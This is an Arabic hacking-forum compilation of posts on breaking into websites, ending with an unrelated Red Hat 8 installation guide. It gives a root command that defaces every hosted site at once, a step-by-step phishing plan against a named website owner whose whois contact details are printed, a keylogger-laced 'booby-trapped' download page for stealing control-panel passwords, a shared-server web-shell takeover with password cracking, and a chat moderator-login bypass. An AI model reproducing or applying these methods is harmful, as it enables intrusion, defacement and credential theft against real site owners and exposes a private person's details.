127.0.0.1 - - [07/May/2004:16:37:20 +0300] "GET /test/ HTTP/1.1" 200 1043
127.0.0.1 - - [07/May/2004:16:38:44 +0300] "GET /test/ HTTP/1.1" 200
-------------------------------------
يكون هكذا يجب مسح الملفين ملف الــerror والـــaccess

هو شبيه بحد أكبر لملف الــerrors الى بالمنتديات بلوحة التحكم في المنتدى ياطويل العمر تحصل بمجلد vb ملف بأسم errors افتحه راح تحصل في داخله
=====
[10-May-2004 01:19:32] PHP Warning: Can't connect to MySQL server on 'localhost' (10061) in http://www.xxxxx.com\vb\index.php on line 48
---------------------------------
الى هو تاريخ دخولك للمنتدى وحتى لو تحذفه وترجع لصفحة الرئيسيه تبع المنتدى بيرجع وينزل نفسه من جديد وبنفس المعلومات الى فوق لكن يختلف عن ملف اللوج الى بالسيرفر انه مايضع رقم الاي بي تبعك
فهمت الحين إن شاء الله يكون شرحي واضح

س4: ماهو السكريبت كيدز؟
الجواب هو قبل قرائتك الجزء اللي فوق يعنى يريدون ان يخترقوا فقط بدل مايتعامل مع الإختراق بالشكل الافضل
وهو الشخص الذي يكتفى بوضعه شعار ((تم اختراق الموقع)) على السيرفر وخلاص
وانا اعتبر الاخوان الى الآن يخترقوا بثغرات في محركات البحث ويضعوا اسمائهم وتم اختراق الموقع وصلح ازعاج وزحمه اعتبرهم سكريبت كيدز ---------- امثال ((اللى مايتسماش وخد بالك))
<< ----- انا وضحت هذا حتى يصحوا من النوم ويشوفوا طريقه افضل من انهم يخترقوا بثغرات تعبانه وكل واحد يقول انا الى مكتشف الثغره ..... ليت الثغره تستاهل علشان تتفاخر بأكتشافها

المهم نرجع لمحور حديثنا ....
<><><><><><><><><><><><><><><><><><><><><><><><> <> <
س5: كيف يمكنني إختراق جميع المواقع التى علي السيرفر مرة وحدة! ؟؟
الكثير يااخوان بيقول الحين ليش تضع طريقة السكريبت كيدز وانت قبل شوي تسب في الى يشهر بنفسه

وراح اوضح لكم ياشباب انا الى اشوفه حتى لو انه مبتدئ بس يحاول انه يتعلم فهذا يعجبني صراحه
اما الذي بس وقته كله يخترق ويضع شعاره وهو له وقت طويل بالاختراق هذا اقول عنه كراكر

وانا لا اشرح الا الشئ الذي مريت به يعنى انا لما كنت مش عارف حاقه يعنى مش عارف راسي من رقليه يااخوان ((قلبنا : ) )) اول ماكنت مبتدئ كنت اتشائم اذا حاولت وحاولت اخترق وفشلت ولاوضعت شعاري وهذا من حقك كأنك مبتدئ ولك الحرية ويستاهل صاحب الموقع او الشركه اختراق موقعه اذا كان ماوضع حمايه لازمه ((وقانون الهاكر لايحمى مغفلين))
<<<< =---- لاتواخذوني مدمن لهجه مصرية : )
والان ابسط ياعم وهذا انا بشرح لك الطريقه ونبدا
............
الطريقه سهله جدا ---------- نفذ هذا الامر على السيرفر "Hacked by Super-Crystal"أو"no one is born a master but some are born to be master" هذا بدون شعار وصور يعنى فقط كلام وينزل على جميع الضحايا (المواقع) الى على السيرفر المخترق
فقط نفذ هذا الامر على السيرفر ::::: صلاحية روت ياقلبي
echo "Hacked by Super-Crystal" > /home/*/public_html/index.htm
اتمنى انك ترجع لموضوع الاخ سب زيرو (((( Mass Deface في منتديات تحت الصفر(sub-0.net/vb) لانه شارح طريقه وضع شعار غير هذه الطريقه وبنفس الوقت سهله جدا
## اسأله حول الموضوع ##
ماهي فائده الاكسبلويت؟؟
(اتمنى من الاخوه الجواب من نفس الموضوع حتى اتأكد ان شرحي واضح )
هل هذا النوع من انواع الباكدور؟؟؟
Kernel Exploits
حدد هل هذا من اللوق او ملفات الــerrors التى توجد بلوحة التحكم بالمنتديات؟؟
May-2004 01:19:32] [****] [client 212.77.56.1] File does not
--------------------__----____----____---___---___---___---___---___------------
____________---__-------___------__----__------__----__-----__-----________

في دروسنا ?لقادمة سوف نوافيكم بآخر الإخبار والمستجدات في الساحة العربية والحره والجزيرة
وفي الختام اتمنى من الله عزوجل انى قد وفقت بهذا الشرح المختصر
كاتب الموضوع: (SupEr-CrystaL) سوبر كريستال



================================================== ==============================





لمن يريد معرفت كل شيئ عن التيل نت

للكاتب :دكتور الحب


المقدمة :

هذا الموضوع كتب لكي يساعد المستخدم العادي على فهم التلنت وكيف يعمل



الأدوات :

( من الأفضل قراءة المستند بالكامل قبل إستعمال التلنت )

1- العقل

2- التلنت ، وهناك نوعان

- Ewan

- تلنت ( وهو الملائم لنا لأنة يأتي مع الوندوز )

في هذا المستند سوف نقوم بشرح تلنت الوندوز أما شرح الـ Ewan فسوف يكون في مستند آخر بإذن الله



ماهو التلنت ؟؟

هو برنامج ربط لشبكات TCP/IP مثل الإنترنت . التلنت يعمل على جهازك ويربطة مع أي سيرفر على الشبكة . تستطيع بعدها إدخال الأوامر عبر برنامج التلنت وسوف يتم تنفيذ هذة الأوامر وكأنك تدخلها مباشرة إلى السيرفر . وهذا يتيح لك التحكم في السيرفر والإتصال مع سيرفرات أخرى على الشبكة . وللإتصال بأي سيرفر يجب عليك الإتصال بأي منفذ (Port) مفتوح فية وإدخال إسم المستخدم وكلمة السر .



الأن كيفية إستخدام التلنت بالتفصيل :

لتشغيل التلنت في الوندوز إتبع الخطوات كما يلي :

Start > Run > telnet

بعد فتح البرنامج سوف ترى نافذة خالية بيضاء

( إذا كان هذا الشي يجعلك تصل إلى درجة إغلاق البرنامج فيجب أن تعرف أنة في السابق قبل إستخدام برامج الجرافيكس كيلنت مثل الإيميل كيلنت والمتصفح كان التلنت هو النافذة الوحيدة للدخول إلى الإنترنت )

بعد هذا إضغط على connect في القائمة الرئيسية وبعد ذلك إختر remote system وسف تظهر لك نافذة كهذة :

_ _ _ _ _ _ _ _ _ _ _ _ _ _ _
|Connect ________________ |
|Hostname Neutral________________| |
|Port Neutral________________| |
|Term type:|________________| |
| ___________ __________ |
|| | | ||
|| Connect | | Cancel ||
||___________| |__________||
|_____________________________|


أحسن مكان لإتصالك الأول بالتلنت هو حساب الشل ( shell account ) الخاص بك . الشل أكاونت هو مساحة من نظام اليونكس Unix على الشبكة . أو تستطيع الإتصال بموقعك من خلال بروتوكول الـFTP

مثلاً كان الموقع http://www.mysite.com/ نكتب في خانة Host [ FTP.mysite.com ] يعني إذا كان إسم الموقع http://www.alkajool.com/ إذا نكتب في خانة Hostname [ FTP.alkajool.com ] وفي خانة Port نكتب رقم منفذ بروتوكول الـ FTP وهو 21 وبعد هذا نضغط على زر Connect وسوف يقوم البرنامج بالإتصال بالموقع . عندما يتم الإتصال بالموقع سوف يكون شكل نافذة البرنامج هكذا :


_______________________________________
|_Telnet________________________________|
|_Connect_Edit_Terminal_Help____________|
|220 proFTPD |
| |
| |
| |
| |
| |
| |
|_______________________________________|

في هذة النافذة سوف ترى نوع ونظام الـ FTP الذي يستخدمة الموقع كما نرى في الصورة فإن النظام هو proFTPD . الآ ن لكي ندخل إلى الموقع يجب أن ندخل إسم المستخدم وكلمة السر . نكتب هذا الأمر لإدخال إسم المستخدم [ user username ]

( إذا طلب منك الموقع إدخال إسم المستخدم مثل username أوLgin فتكتب إسم المستخدم فقط بدونuser)

ومن ثم سيطلب منك الموقع كلمة السر pass فإكتب كلمة السر هناك طريقة أخرى للدخول إلى الموقع وهي الأنونيوماس anonymous وسوف يكون فيها إسم المستخدم anonymous وبعد أن نكتب إسم المستخدم سوف نرى هذة الجملة guest login accepted الآن علينا إدخال كلمة السر وسوف تكون في هذة الحالة عنوان بريدك الإلكتروني وبعد هذا سوف يعطيك الموقع جملة تدل على أنة تمت الموافقة على الدخول إلى الموقع . الآن نكتب هذا الأمر help وسوف تظهر لنا الأوامر التي نستطيع إستخدامها فحاول التعرف على هذة الأوامر ووظائفها . بعد أن تنتهي من إستكشاف البورت 21 وطريقة الإتصال من خلالة وتعرف أوامر الـFTP حاول الدخول إلى الموقع بواسطة بورتات أخرى مثل هذة البورتات :

الخدمة البورت

------ -------

21 FTP
25 SMPT

37 TIME

79 Finger

80 HTTP

110 POP3

===========================================

اول درس في المواقع

للكاتب :وررس


--------------------------------------------------------------------------------


بسم الله الرحمن الرحيم

طيب شباب رجاءا وخاصه محبين القص واللزق مثل مايقولوا

ماينشر الموضوع الا بعلمي
بسم الله
طيب اذا وصلت الى مرحله من الياس بختراق موقع شتسوي تقول خلاص

لاطبعا الاختراق انواع والوسائل كثيره المهم توصل الى هدفك وانا انشالله بشرح لكم بالكلام طبعا وبالتفصيل طريقة اختراق اي موقع اما مساله بالصور انا مليت منها صراحه واعتقد اني اكلم اعضاء واعين ولاباس اذا فيه مبتدئين بيلاقوا انشالله الشروحات بالمنتدى على شان مااطول
ابدي

انا خططت اخترق موقع وخلنا نشرح على الموقع الملعون
http://www.meca-love4all.com
وحاولت اخترق الموقع بشكل رسمي وماقدرت ابدي اخترقه بهذي الطريقه اللي انشالله بتحوز على رضاكم وبيخترق فيها الكثير منكم انشالله

اولا اعمل سيرفر للبرنامج المحبب لي وانا افضل ياشباب البرنامج يكون كي لوغر وافضله بعد يكون برو اجينت الاصدار الاخير لانه بيجيب الباسووردات كلها وبشكل مرتب وحلو

طيب ثانيا ارفع الباتش على صفحتي الشخصيه واخذ اللنك واعمل فيه سيرفر داون لودر

ثالثا ياشباب احول باتش الداون لودر الى صفحه مفخخه وارفهعا على صفحتي واخذ اللنك تبعها

لاتستانسون ياشباب تو الناس الشغل للحين مابدا والهندسه الاجتماعيه هيا موضوعنا اليوم


افتح التيرمنال من اللينكس واللي ماعنده لينكس شيسوي يدور له على برنامج للامر whois يشتغل على وندوز والحمدالله البرامج اعتقد انها موجوده وقبل لاابدا بالشرح انا ابي شغلتين من الامر بس
ايميل صاحب الموقع والشركه المستضيفه
(3)

نطبق الامر وشوفوا النتيجه المرضيه


worse1980((@))localhost worse1980]# whois meca-love4all.com
[Querying whois.internic.net]
[Redirected to whois.opensrs.net]
[Querying whois.opensrs.net]
[whois.opensrs.net]
Registrant:
Meca
18305 Nightingle Ct,canyoun County
Ca ,91387
Canyoun County, Ca 91387
us

Domain name: MECA-LOVE4ALL.COM

Administrative Contact:
Adal, Sam truth10((@))rogers.com
18305 Nightingle Ct,canyoun County
Ca ,91387
Canyoun County, Ca 91387
us
8186339939
Technical Contact:
Adal, Sam truth10((@))rogers.com
18305 Nightingle Ct,canyoun County
Ca ,91387
Canyoun County, Ca 91387
us
8186339939


Registration Service Provider:
HomepageUniverse, support((@))homepageuniverse.com
+44.8457606128
+44.8457606128 (fax)
http://HomepageUniverse.com
HomepageUniverse may be contacted for domain login, DNS changes, and
all general domain support questions.


Registrar of Record: TUCOWS, INC.
Record last updated on 16-Apr-2004.
Record expires on 02-Feb-2005.
Record created on 02-Feb-2004.

Domain servers in listed order:
NS.HOMEPAGENAMES.NET 216.127.78.156
NS2.HOMEPAGENAMES.NET 216.127.78.41


Domain status:
ACTIVE

حصلنا ايميل صاحب الموقع والشركه المستضيفه طيب وشنسوي الحين انا اقولكم واهني الهندسه الاجتماعيه تلعب دورها يعني تقدر تلعب على صاحب الموقع من غير معرفة الشركه المستضيفه انتا وذكائك واعتقد ان الكل لعب اللعبه هذي والهاكر الحقيقي هوا اللي يراوغ ويعرف يخدع ضحيتك ويمثل على اكمل وجه ويضبط دوره على الاخر ياشباب ان الجزء هذا اهم من كل الاجزاء الباقيه يعني لو انتا شخص محترف بالهندسه الاجتماعيه وتدرس ضحيتك قبل لاتنقض عليها وتعرف شنو يحب وشنو مايحب بتخترقه بسهوله تامه ولاتنسون ان انتا معاك لنك تبي تخترق فيه وهذا اقوى سلاح موجود وفتاك ياساتر!
(3)

الخطوه الاخيره هيا اني افتح اي برنامج يرسل ايميلات وهميه من عناوين وهميه ومثال على هذا البرنامج واعتقد انه افضل برنامج لهذا النوع هوا الماس ايميل وابدا ارسم خطتي على صاحب الموقع
ارسل من عنوان الشركه المستضيفه واقوله انه لازم يزور الرابط هذا لخلل معين بموقعه او لسيرفس معين او لغرض معين يخليه يضغط على اللنك وهوا اعمى وانتا وذكائك وترتيبك للموضوع
يعني كل ماضبطت العمليه كلما تكون قربت لباسوورد الموقع
عموما لما يضغط على اللنك بيكون باسوورد الموقع في ايميلك ينتظرك تدخل فيه السي بانل
:tu

ملاحظات ياشباب لازم يكون من الاساس في عمل الباتش اسم مميز للضحيه علشان اتفرق فيه بين ضحاياك وتضبط سيرفرك على الاخر وتاكد من انه شغال على شان مايروح تعبك ببلاش وهالله هالله
بالهندسه الاجتماعيه ياوحوش
(3)
اتمنى التوفيق للكل وانا كل شي عندي جاهز لكني ماطبق على الموقع المذكور لاني ابي مشاركتكم بالاختراق وتحياتي للجميع وانشالله ايكون الدرس جديد ومفيد


تحياتي

================================================== ===

الدرس الثاني في اختراق المواقع

للكاتب :ورررس



بسم الله الرحمن الرحيم
مثل مابديت بالجزء الاول ابدا بالجزء الثاني الرجاء عدم نقل الموضوع الا بستشاره ليش لان الموضوع ماهو نقل زي عادة الشباب ولا ترجمه الموضوع عصارة افكار وتجارب!
الشي المضحك اني ماراح ابدا زي عادة الشباب بنقل موضوع من الاف السنين موجود بالمنتديات يبهرو عليه وينزلوه يقولولك روح النت كرافت وتاكد ان الموقع يدعم الفرونت بيج واذا تاكدت اضف هذا الرابط بعد عنوان الموقع هههههههههه يروح المسكين ايتاكد ان الموقع يدعم الفرونت بيج وياخذ اللنك ويركض ويضيف عليه الرابط ويضغط انتر وهوا يقول ياربي تكفى يطلع الباسوورد

واخرتها شاشه غلط جايه بوجهه واذا طلع الباسوورد مشفر طار من الفرحه وقعد يعمل له كراك ثلاث ايام واذا اتفك التشفير طلع الباسوورد غلط ليش! لانه وهمي يامسكين ياهاكر كل هذا التعب واخرتها باسوورد وهمي ليش لان الشباب يحبوا ينقلوا المواضيع هذي ويشتتوا عقول المساكين
فيها ماعلينا ندخل بالموضوع لاني لو بتكلم بالموضوع اللي فوق ماخلصت!

اولا لو ابي اسال اغلب الاعضاء شنو الموقع يقول موقع مايدري شنو هوا الموقع وهذا انا ملاحظه عند الكل!
الموقع ياشباب اللي مرهبكم ومدوخكم ماهو الا على جهاز حاله حال اجهزتكم اللي تستخدمونها الجهاز منزل سيرفر ومنزل الموقع عليه يعني انتا اذا تبي تخترق موقع ترا انتا تخترق جهاز كمبيوتر متصل بالنت 24 ساعه جهاز عادي زي جهازك اي ليش مستغربين

طيب ياوورس اذا المساله بالشكل هذا انا خططت على موقع وابي اخترقه منين ابدا؟
اقولك
بسم الله

لازم تعرف الموقع نفسه شغال على ايش
وندوز
لينكس
يونيكس
الخ
ليه طيب اعرف؟
لازم ياحبيبي تعرف لانك بتسوي على الموقع سكان ومدام انك بتسوي اسكان لازم تعرف الثغرات اللي بتعمل عليها سكان تابعه لاي نظام بالضبط

ومنين اعرف اقولك ادخل موقع نت كرافت والزق رابط الموقع وهوا يقولك شغال على ايش
طيب عرفنا شغال على ايش وبعديــن
بعدين لازم تسوي سكان على الموقع وانا انصح ببرنامج الاخ عمران الغامدي اللي هو برنامج عمران سكان لانه سريع صراحه و
طيب ياوورس حنا ليه نعمل سكان انا اقولك لانا نبي نلقى ثغره بالموقع توصلنا لملف الباسوورد واذا لقيناه قطعنا نص الطريق ويبقى فك تشفيره

اها طيب انا عملت سكان ومالقيت اي ثغره بالموقع وش العمل!
العمل انك تفحص البورتات المفتوحه بالموقع والغالب ماراح تخترق بالطريقه هذي لان بورت الاف تي بي والتلنت بيكون عليها باسوورد للحمايه اما اذا ماكان الباسوورد موجود حلال عليك الموقع

طيب انا عملت سكان على الثغرات وعلى البورتات وعجزت مالها حل ثالث عندك

فيها حل ثالث ورابع اذا انتا مصمم تخترق الموقع
كيف؟
الحل الثالث موجود بالدرس الاول وطريقة نجاحه ميه بالميه بس يبيلها اشوية تفتيح مخ وذكاء
اما الرابع هوا انك تحجز دومين على نفس السيرفر اللي عليه الموقع
ليه؟
لاننا بنخترق السيرفر كامل علشان نوصل للموقع اللي نبيه وشلون تتم الطريقه انتا احجز موقع على نفس السيرفر وارفع عليــه شل ومن الشل بتخترق السيرفر كامل!
فيه مشاكل نعم فيه السيف مود لكن كل شي وله حل واذا وصلت للسيرفر بتعرض من خلال الشل
جميع باسووردات المواقع اللي عليه ومن ضمنها موقع حبيبنا اللي نبيه

ياسلام وبعدين وصلنا لكن الباسوورد مشفر ديس ماهي مشكله المساله يبيلها اشوية صبر بس
شغل جون وخله يعمل كراك للباسوورد وانشالله يوم يومين بتحصل بالاخير الباسوورد ويعتمد وقت الفك على درجة التشفير للباسوورد وقوتها

اخيرا تحياتي للكل واذا الموضوع عجبكم انشالله بيكون فيه درس ثالث
اتمنى اني افدتكم ولو بجزء بسيط انا عارف المحترف بيمر على الموضوع ويمكن يستفيد معلومه معلومتين لكن انا متاكد ان المبتدا المستفيد الاول من الدرس وانا صراحه ماحبيتها اشوف الهاكرز يحوسون بالنت يدوروا شروحات وبالاخير شروحات من غير فايده قلت انزل الموضوع للاستفاده


تحياتي

================================================== =

ثغره لتدخل سوبر احمر او ازرق بالشات

للكاتب :Dr.HaCkErS

ملاحظة : لتطبيق هذه الطريقة يجب أن تعرف إسم أحد السوبر المشرفين
ملاحظة2: الثغرة على بعض المواقع تنجح والبعض الآخر لأ

الآن موضوع الأخ كاتب الموضوع

--------------------------
بعد التحيه شباب..

حبيت اقدم لكم ولأول مره في المنتديات العربية

هذه الثغره وهي خاصه بالدي جي تشات

ووضيفتها هي فقط تمكنك من الدخول كسوبر احمر أو أزرق..

البرامج التي نحتاج إليها:

الفرونت بيج أي أصدار..

ويجب ان تكون لك مساحه مجانيه على اي موقع على مزاجك

---------------
الاستخدام:
روح إلى الموقع الي تبي تكون سوبر احمر فيه....بعدين ادخل قسم المراقبين

رح يطلب منك الاسم والباسوورد أنت لا تهتم أظغط من الكيبورد الي عندك Ctrl+A بعدين Ctrl+C

روح إلى برنامج الفرونت بيج وسوي لصق ..

أمسح خانة أدخل الباسوورد

بعدها سوي حفض للصفحه الي سويتها ..

روح إلى المساحه المجانيه تبعك وحمل الصفحه الي سويتها

اذا حملتها وخلاص ادخل بأسم أي شخص من المراقبين ورح يتم دخولك . ولحين العب في الدي جي تشات لعب

لا احد يسألني ترى سهله جربوها

انا مجربها وناجحه 100%

منقول للفائده



تحياتي لكم


==================================================

طريقه تثبيت لينكس ريد هات 8 على جهازك والشرح بالصور

للكاتب والاستاذ : بوفهد

طريقة تثبيت لنيكس ردهات redhat 8 خطوة بخطوة

الكثير من مستخدمي الوندوز يرغبون في تجربة نظام اللنكس قبل التفكير في الانتقال كلياً اليه او حتى جزئياً. و الكثيرون يسمعون عن معاناة البعض في تنصيب النظام و الاختلافات التي يحويها و التي لم يتعودوا عليها في الوندوز. في هذا الدرس ان شاء الله سنقوم بشرح طريقة تثبيت لنكس ردهات 8 خطوة بخطوة مع صور عديدة تدعم الشرح.

الرجاء انتظار تحميل الصوور

بعد الحصول على الاقراص الخاصة بالنظام سواء بشراءه او استعارته من صديق او حتى تنزيله مجاناً من موقع الشركة. سيجد المستخدم ان لنكس ردهات8 يحوي على 3 اقراص رئيسية تحوي النظام و الكثير من البرامج كبرامج شبيهة بالاوفيس والفوتوشوب بالاضافة الى العديد من الاضافات.
في البداية نتأكد من ان الاقلاع في البيوس سيكون من السيدي روم, و من ثم نضع القرص الاول في سواقة الاقراص المدمجة و نعيد تشغيل الكمبيوتر. بعد الاقلاع ستواجهنا هذه الصورة:















تخيرنا الصفحة بما نريد ان نعمل, في حالتنا ( تثبيت النظام) نضغط على زر enter لنكمل اجراءات التثبيت بواجهة رسومية.
بعد وقت قصير سيسألنا النظام ان اردنا ان نعمل اختبار للاقراص المدمجة او السيديات التي لدينا لكي يرى هل هي صالحة ام تالفة, يمكننا عدم الدخول في هذه الاختبار لتوفير الوقت ان كنا متأكدين ان النسخ سليمة , الصورة التالية توضح المسألة و يجب ان نحتار .skip لنتجاور الاختبار




بعدها سيبدأ برنامج الاناكوندا الخاص بتثبيت النظام بالعمل حيث انه سيتأكد من نوع الفأرة و كرت الشاشة و غيرها من الامور التي يحتاجها لبدء عملية التثبيت و من ثم يتم الانتقال الى مرحلة بدء الاعدادات بالصورة التالية:





يتم اختيار اللغة التي يريدها المستخدم لاتمام عملية التثبيت ( هذا الاختيار لاتمام عملية التثبيت و ليس دعم اللغة في النظام) شاهد الصورة التالية:




بعدها سيسألك عن نظام لوحة المفاتيح الذي تفضله, نصيحتي هي ان تضغط على زر Next و تدع النظام نفسه يختار الذي يناسبه للوحة المفاتيح والفأرة, ففي اغلب الاوقات ما يختاره النظام هو الصحيح , الا لو كنت جازماً انك تعرف ان اختياره ليس دقيقاً, انظر الى الصورة التالية:









الصورة التالية تخيرك بنوعية الاستخدام الذي تنوي ان تستخدم فيه الجهاز, هل هو سرفر, ام لابتوب ام كمبيوتر شخصي عادي, عند اختيارك احدى هذه الاختيارات فان النظام سيثبت البرامج الخاصة على هذا الاساس, فمثلا ان اخترت ان يكون التثبيت و الاستخدام هو كسرفر, فلن تجد العاب عديدة مخزنة معه! لان السرفر ليس للّعب! او يمكنك ترقية النسخة الموجودة لديك باختيار upgrade existing system .اما ان كنت تريد ان تختار البرامج بدقة اكثر اختر custom لتختار بالضبط ما تريد و هذا ما سنفعله ان شاء الله:





بعد اختيار custom ننتقل لمرحلة تقسيم القرص الصلب لوضع النظام فيه. يوجد اختيارات عديدة هي Automatic Partition او manual partition using Disk Druid او manual partition using Fdisk. سنختار الخيار الثاني و ثم ننتقل للصورة التالية ( في حالة كنا نستخدم نظام اخر مثل الوندوز على نفس القرص الصلب) سيتم اعادة تقسيم القرص لتخزين اللنكس على المساحة خالية من القرص الصلب ( يجب تفريغ مساحة و جعلها خالية و يمكن ذلك بواسطة برنامج Partition Magic من الوندوز مثلا او من الFdisk عند تثبيت الوندوز او عمل ذلك بواسطة manual partition using Disk Druid او manual partition using Fdisk). بعد توفير مساحة خالية للردهات يجب تظليلها و الضغط على New ( في حالة اختيار الخيار الثاني) و ستظهر لنا نافذة نختار في اولها / من القائمة المنسدلة و نختار ext3 لتهيئة المساحة المختارة و نختار حجم المساحة, و في حالتنا في العادة نأخذ كل المساحة المختارة و من ثم نضغط على OK. الصورة التالية توضح اختيار القرص الصلب كله كخيار للنكس:







سينبهك على انك لم تختار مساحة للSWAP و هي تستخدم في العادة كنوع من دعم للذاكرة بحيث انها تستخدم جزء من القرص الصلب كذاكرة مؤقتة مثل الرام, و عادة يكون حجمها ضعف حجم الرام الموجود بالجهاز, يمكننا الاستغناء عن هذ هالخطوة رغم انها قد تطور الاداء..
نأتي بعدها لمرحلة تثبيت الLinux Boot Loader و هو برنامج يتم وضعه في اول القرص الصلب او احد التقاسيم التي يختارها المستخدم, وظيفة هذا البرنامج هو انه بعد ان يقوم المستخدم بتشغيل الجهاز و الانتهاء من اجراءات اختبار العتاد ينتقل الى قائمة بانظمة التشغيل الموجودة في النظام و عند اختيار النظام يتم تحميل النظام و الدخول اليه. يمكن اختيار نوع البرامج بالضغط على change boot loader و اختيار من Grub او LiLo او لا يتم تثبيت هذا البرنامج. شخصياً سأختار الGrub و ان رغب المستخدم بوضع كلمة سر هنا , يختار الخيار use a boot loader password





بعدها تأتي مرحلة اعداد كرت الشبكة , ان كنت مرتبط بشكبة و فيها DHCP Server ستحصل منها على الايبي فاكمل على نفس الخيارات الموجودة و ان كنت لا تستخدم DHCP server فاضغط على Edit و ضع الايبي الذي تراه مناسباً و ايضا بالنسبة للgateway و الDNS Server والhost name كالصورة التالية:




المرحلة التالية هي خيارات الفايروول او الجدار الناري. يتم اعداد الجدار الناري هنا بالسماح باي نوع من الاتصال بالجهاز, اذا لم يكن لديك خلفية عن الموضوع فاختر use default firewall rules و اختر Meduim من القائمة الاولى, اما ان كانت لديك خلفية عن الموضوع فانه من السهل اختيار انواع الاتصال الذي تتوقعه لجهازك مثل كونه web server فتسمح بالwww, ftp, SSH مثلا.
بعدها يأتي دور اللغات,
الرجوع الى أعلى الصفحة اذهب الى الأسفل
https://moo0ooed.yoo7.com
 
أقوى شرح لاختراق المواقع من الصفر الى الاحتراف
الرجوع الى أعلى الصفحة 
صفحة 1 من اصل 1
 مواضيع مماثلة
-
» أقوى شرح لاختراق المواقع من الصفر الى الاحتراف
» أقوى شرح لاختراق منتدى بالصور
» برنامج قوي جدا لاختراق المواقع والمنتديات ، وبالعربي !!
» برنامج لاختراق الحاسوب
» Cybernetic 1.62 تحميل برنامج لاختراق الاجهزه

صلاحيات هذا المنتدى:لاتستطيع الرد على المواضيع في هذا المنتدى
منتديات مودي لاختراق و الهكر :: منتدي مودي للاختراق و الهكر :: برامج الهكر و الاختراق للمنتديات-
انتقل الى: